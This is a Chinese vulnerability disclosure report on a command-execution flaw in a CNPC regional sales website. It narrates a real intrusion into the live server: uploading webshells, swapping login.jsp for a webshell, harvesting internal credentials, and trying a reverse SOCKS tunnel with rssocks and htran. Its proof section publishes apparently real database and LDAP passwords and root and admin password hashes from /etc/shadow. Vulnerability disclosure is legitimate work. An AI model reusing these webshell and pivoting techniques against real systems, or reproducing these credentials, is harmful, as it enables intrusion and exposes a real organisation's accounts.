漏洞概要
关注数(24)
关注此漏洞
漏洞标题:中国石油天然气集团公司可被内网渗透
提交时间:2014-12-03 15:53
修复时间:2015-01-17 15:54
公开时间:2015-01-17 15:54
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-12-03: 细节已通知厂商并且等待厂商处理中
2014-12-08: 厂商已经确认,细节仅向厂商公开
2014-12-18: 细节向核心白帽子及相关领域专家公开
2014-12-28: 细节向普通白帽子公开
2015-01-07: 细节向实习白帽子公开
2015-01-17: 细节向公众公开
简要描述:
无意点开了中石油一个站有命令执行漏洞
发现是内网 于是就有了一个渗透测试的过程
详细说明:
浏览到一个中石油的站西北化工销售公司
http://xbhg.cnpc.com.cn/
发现页面下面有个 登陆窗口
鼠标放到登陆按钮上,显示出一个链接
http://xbhg.cnpc.com.cn/ExtranetWeb/loginDo.do
然后测试了一下发现有命令执行漏洞还是ROOT权限
看了下IP属于内网
看了下网络链接情况
22端口开放
再看下登陆情况,可以查看管理从哪里登陆这个服务器
对该服务器大致情况有了一个了解
为了方便操作 上传一个JSP shelL
但是出现了一个问题 访问SHELL 马上就跳转到LOGIN.JSP 非常苦恼。
不过发现只要不是JSP后缀就不会跳
这时请出园长的JSPX马,成功连接上菜刀
然后对该服务器进行了一些信息收集
得到大量内网服务器数据库账号密码等信息
还有部分邮件账号信息
下一步计划从内网反弹一个SOCKS5代理出来
这个时候出现了问题,用菜刀上传ssocks 总是失败
菜刀命令行下WGET下载也失败
于是想了一下 既然访问JSP总是跳到LOGIN.JSP 那么就暂时把LOGIN.JSP替换成JSP大马吧 果然可行
我们把login.jsp替换 上传大马 上传文件
解压
[/]$ tar -zxvf ssocks.tar.gz
编译./configure&make
进入SRC目录 执行命令./rssocks --socks *.*.*.*:1234
本机用htran监听 htran -listen 1234 1988
可惜总是失败
看了下服务器的连接状况 发现一直处于等待连接的状态
然后经过N久尝试 认为可能是这个服务器不能访问外网
于是服务器执行ping -c 2 www.baidu.com
不能接受返回包,应该是不能访问外网
这时候准备继续尝试下简历HTTP通道
把服务器某端口转发到本机
看起来貌似成功了,不过可惜,没多久就断开了。
略感伤心
接着下一步就是上传NMAP直接在服务器进行端口扫描 弱口令扫描等
不再继续了。。。。有点疲倦!
漏洞证明:
#jdbc.driverClass=com.mysql.jdbc.Driver
jdbc.jdbcUrl=jdbc:oracle:thin:@10.88.182.5:1521:orcl
jdbc.user=xbhg_wwqy
jdbc.password=member
ldap.username=xbhg_xiangwei
ldap.passwd=xiangweiway
本服务器账号密码
root:$6$uCxdxOLi$789hWWk/IyuEKp/pIKbZB2A81VmWzH5koW7o.tjeRc415cx5QIMSPF9.cOuHiNGVsNcfoS36SpmuszY8cHNs7.:16249:0:99999:7:::
bin:!*:15615:0:99999:7:::
daemon:!*:15615:0:99999:7:::
adm:!*:15615:0:99999:7:::
lp:!*:15615:0:99999:7:::
sync:!*:15615:0:99999:7:::
shutdown:!*:15615:0:99999:7:::
halt:!*:15615:0:99999:7:::
mail:!*:15615:0:99999:7:::
uucp:!*:15615:0:99999:7:::
operator:!*:15615:0:99999:7:::
games:!*:15615:0:99999:7:::
gopher:!*:15615:0:99999:7:::
ftp:!*:15615:0:99999:7:::
nobody:!*:15615:0:99999:7:::
dbus:!!:16143::::::
usbmuxd:!!:16143::::::
rpc:!!:16143:0:99999:7:::
vcsa:!!:16143::::::
rtkit:!!:16143::::::
abrt:!!:16143::::::
avahi-autoipd:!!:16143::::::
saslauth:!!:16143::::::
postfix:!!:16143::::::
rpcuser:!!:16143::::::
nfsnobody:!!:16143::::::
haldaemon:!!:16143::::::
gdm:!!:16143::::::
ntp:!!:16143::::::
apache:!!:16143::::::
pulse:!!:16143::::::
sshd:!!:16143::::::
tcpdump:!!:16143::::::
oprofile:!!:16143::::::
eipsysadmin:$6$Zj4W4kFL97MVx321$DvgP0kcAC1RSlwVQAOTiWZjMqSs3Tl4oYOSlN0HJHN/bJksvEFCtqL22pkaGMUbC5gmPtFZQVnVFTnaFhvQQp.:16143:0:99999:7:::
sysmonitor:$6$OF0Vctia$tYPHmACHqqaquLPPSDNLoOzfu9KJISQe6YzW0nYHtGeSh8mID.NGPxfits7vqXmgQNaunZEM2C.ErM/CEIGQk.:16188:1:99999:14:::
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-12-08 09:06
厂商回复:
配置不当
最新状态:
2014-12-24:已整改完毕,谢谢。